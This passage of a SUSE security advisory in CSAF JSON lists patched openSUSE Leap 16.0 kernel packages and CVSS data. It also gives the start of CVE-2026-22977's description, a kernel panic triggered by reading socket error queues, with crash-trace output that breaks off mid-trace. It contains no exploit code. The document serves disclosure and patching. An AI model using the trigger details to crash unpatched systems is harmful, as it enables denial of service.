"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22976",
"url": "https://www.suse.com/security/cve/CVE-2026-22976"
},
{
"category": "external",
"summary": "SUSE Bug 1257035 for CVE-2026-22976",
"url": "https://bugzilla.suse.com/1257035"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2026-22976"
},
{
"cve": "CVE-2026-22977",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22977"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: sock: fix hardened usercopy panic in sock_recv_errqueue\n\nskbuff_fclone_cache was created without defining a usercopy region,\n[1] unlike skbuff_head_cache which properly whitelists the cb[] field.\n[2] This causes a usercopy BUG() when CONFIG_HARDENED_USERCOPY is\nenabled and the kernel attempts to copy sk_buff.cb data to userspace\nvia sock_recv_errqueue() -\u003e put_cmsg().\n\nThe crash occurs when: 1. TCP allocates an skb using alloc_skb_fclone()\n (from skbuff_fclone_cache) [1]\n2. The skb is cloned via skb_clone() using the pre-allocated fclone\n[3] 3. The cloned skb is queued to sk_error_queue for timestamp\nreporting 4. Userspace reads the error queue via recvmsg(MSG_ERRQUEUE)\n5. sock_recv_errqueue() calls put_cmsg() to copy serr-\u003eee from skb-\u003ecb\n[4] 6. __check_heap_object() fails because skbuff_fclone_cache has no\n usercopy whitelist [5]\n\nWhen cloned skbs allocated from skbuff_fclone_cache are used in the\nsocket error queue, accessing the sock_exterr_skb structure in skb-\u003ecb\nvia put_cmsg() triggers a usercopy hardening violation:\n\n[ 5.379589] usercopy: Kernel memory exposure attempt detected from SLUB object \u0027skbuff_fclone_cache\u0027 (offset 296, size 16)!\n[ 5.382796] kernel BUG at mm/usercopy.c:102!\n[ 5.383923] Oops: invalid opcode: 0000 [#1] SMP KASAN NOPTI\n[ 5.384903] CPU: 1 UID: 0 PID: 138 Comm: poc_put_cmsg Not tainted 6.12.57 #7\n[ 5.384903] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014\n[ 5.384903] RIP: 0010:usercopy_abort+0x6c/0x80\n[ 5.384903] Code: 1a 86 51 48 c7 c2 40 15 1a 86 41 52 48 c7 c7 c0 15 1a 86 48 0f 45 d6 48 c7 c6 80 15 1a 86 48 89 c1 49 0f 45 f3 e8 84 27 88 ff \u003c0f\u003e 0b 490\n[ 5.384903] RSP: 0018:ffffc900006f77a8 EFLAGS: 00010246\n[ 5.384903] RAX: 000000000000006f RBX: ffff88800f0ad2a8 RCX: 1ffffffff0f72e74\n[ 5.384903] RDX: 0000000000000000 RSI: 0000000000000004 RDI: ffffffff87b973a0\n[ 5.384903] RBP: 0000000000000010 R08: 0000000000000000 R09: fffffbfff0f72e74\n[ 5.384903] R10: 0000000000000003 R11: 79706f6372657375 R12: 0000000000000001\n[ 5.384903] R13: ffff88800f0ad2b8 R14: ffffea00003c2b40 R15: ffffea00003c2b00\n[ 5.384903] FS: 0000000011bc4380(0000) GS:ffff8880bf100000(0000) knlGS:0000000000000000\n[ 5.384903] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 5.384903] CR2: 000056aa3b8e5fe4 CR3: 000000000ea26004 CR4: 0000000000770ef0\n[ 5.384903] PKRU: 55555554\n[ 5.384903] Call Trace:\n[ 5.384903] \u003cTASK\u003e\n[ 5.384903] __check_heap_object+0x9a/0xd0\n[ 5.384903] 